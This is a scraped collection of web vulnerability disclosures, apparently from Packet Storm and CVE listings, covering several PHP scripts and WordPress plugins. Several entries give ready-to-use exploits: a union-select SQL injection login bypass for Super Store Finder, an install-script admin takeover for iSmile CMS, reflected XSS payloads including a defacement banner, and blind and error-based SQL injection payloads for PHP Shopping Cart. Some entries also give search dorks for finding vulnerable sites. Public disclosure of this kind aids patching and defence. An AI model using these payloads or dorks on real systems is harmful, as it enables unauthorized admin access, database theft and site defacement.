SQL injection vulnerability in Super Store Finder PHP Script v.3.6 allows a remote attacker to execute arbitrary code via a crafted payload to the username parameter.

    #Title : Super Store Finder PHP Script SQL Injection / Bypass admin login#Researcher : Etharus#Vendor : Joe Iz, https://superstorefinder.net/#Script Demo Url : https://superstorefinder.net/products/superstorefinder/#Version Affected : 3.6 and below#Date : 5 July 2023#FOFA Dork : "designed and built by Joe Iz."# Step 1 : Go to admin login, eg: http://localhost/store-finder/admin/# Step 2 : Enter following payloadusername : ' union select 1,'admin','32ddaaea6874e2d3eab0a9ea6ecbb0d0',4,5,6,7,8,9,10,11-- -password : admin

CVE-2023-38912: Super Store Finder PHP Script 3.6 SQL Injection ≈ Packet Storm

A vulnerability was found in phpipam 1.5.1. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Header Handler. The manipulation of the argument X-Forwarded-Host leads to open redirect. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239732.

CVE-2023-4965

iSmile Soft CMS version 0.3.0 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : iSmile Soft CMS v0.3.0 Add Admin Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.helpernt.com/                                                                                          || # Dork      : JamalCom هذا السكربت مبرمج بواسطة                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The installation file allows you to re-install the script and add a new manager, and the reason is due to the designer.     It is not recommended to delete the installation folder, and the user does not pay attention to deleting the installation file.[+] use payload : /install.php?etape=3[+] http://127.0.0.1/iSmile/install.php?etape=3Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

iSmile Soft CMS 0.3.0 Add Administrator

islamnt CMS version 2.1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : islamnt CMS v2.1.0 XSS Vulnerability Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://sourceforge.net/projects/islam-cms/                                                                        || # Dork      : Powered By Islamnt 2.1.0                                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /onlines.php/%27onmouseover=%27prompt%28984627%29%27bad=%27%3E[+] http://127.0.0.1/Islam/onlines.php/%27onmouseover=%27prompt%28984627%29%27bad=%27%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

islamnt CMS 2.1.0 Cross Site Scripting

Night Club Booking Software version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Night Club Booking Software-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 09/09/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/night-club-booking-software/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the index request parameter is copied into the value of anHTML tag attribute which is encapsulated in double quotation marks. Thepayload byymt"><script>alert(1)</script>fs5xr was submitted in the indexparameter. This input was echoed unmodified in the application's response.The attacker can trick the victim into executing arbitrary commands orcode on his machine remotely.STATUS: HIGH-CRITICAL Vulnerability[+]Test Payload:```GET/1694244800_322/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=6254byymt%22%3e%3cscript%3ealert(1)%3c%2fscript%3efs5xr&date=HTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.825432071.1694256178; _gid=GA1.2.1157015144.1694256178;_gat=1; _fbp=fb.1.1694256177815.1029224882X-Requested-With: XMLHttpRequestReferer: https://demo.phpjabbers.com/1694244800_322/preview.php?lid=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116","Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Night-Club-Booking-Software-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/night-club-booking-software-10-xss.html)## Time spent:00:05:00

Night Club Booking Software 1.0 Cross Site Scripting

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

**ImgHosting 1.3 Cross Site Scripting**

Posted Sep 14, 2023

Authored by indoushka

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 8c169afaf39b32fa5c563194367feecff6f19735b337600d64caa7b0f3c6b6a3

Download | Favorite | View

**ImgHosting 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.3 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://www.127.0.0.1/pikhostingcom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,202)
*   Arbitrary (16,255)
*   BBS (2,859)
*   Bypass (1,744)
*   CGI (1,027)
*   Code Execution (7,302)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,535)
*   Encryption (2,371)
*   Exploit (52,098)
*   File Inclusion (4,228)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,792)
*   Intrusion Detection (894)
*   Java (3,049)
*   JavaScript (860)
*   Kernel (6,732)
*   Local (14,499)
*   Magazine (586)
*   Overflow (12,707)
*   Perl (1,423)
*   PHP (5,153)
*   Proof of Concept (2,343)
*   Protocol (3,606)
*   Python (1,536)
*   Remote (30,859)
*   Root (3,591)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,897)
*   Shell (3,195)
*   Shellcode (1,216)
*   Sniffer (895)
*   Spoof (2,209)
*   SQL Injection (16,411)
*   TCP (2,407)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,829)
*   Web (9,695)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,999)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,005)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,835)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,323)
*   HPUX (879)
*   iOS (352)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,701)
*   Mac OS X (687)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,853)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,907)
*   UNIX (9,308)
*   UnixWare (186)
*   Windows (6,585)
*   Other

ImgHosting 1.3 Cross Site Scripting

The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple shortcodes in versions up to, and including, 7.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVE-2023-4945: class-wcj-general-shortcodes.php in woocommerce-jetpack/tags/7.1.0/includes/shortcodes – WordPress Plugin Repository

The Awesome Weather Widget for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'awesome-weather' shortcode in versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVE-2023-4944: awesome-weather.php in awesome-weather/tags/3.0.2 – WordPress Plugin Repository

A reflected cross-site scripting (XSS) vulnerability in OpenKnowledgeMaps Head Start 7 allows remote attackers to execute arbitrary JavaScript in the web browser of a user, by including a malicious payload into the 'file' parameter in 'displayPDF.php'.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-40617: vulnerability-research/CVE-2023-40617 at main · dub-flow/vulnerability-research

PHP Shopping Cart version 4.2 suffers from a remote SQL injection vulnerability.

    ## Title: PHP Shopping Cart-4.2 Multiple-SQLi## Author: nu11secur1ty## Date: 09/13/2023## Vendor: https://www.phpjabbers.com/## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing## Reference: https://portswigger.net/web-security/sql-injection## Description:The `id` parameter appears to be vulnerable to SQL injection attacks.A single quote was submitted in the id parameter, and a database errormessage was returned. Two single quotes were then submitted and theerror message disappeared. The attacker easily can steal allinformation from the database of this web application!WARNING! All of you: Be careful what you buy! This will be your responsibility!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: id (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT3795=3795-- sRcp&session_id=    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (GTID_SUBSET)    Payload: controller=pjFront&action=pjActionGetStocks&id=1') ANDGTID_SUBSET(CONCAT(0x71717a6b71,(SELECT(ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND(SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html)## Time spent:00:37:00

Tag

#php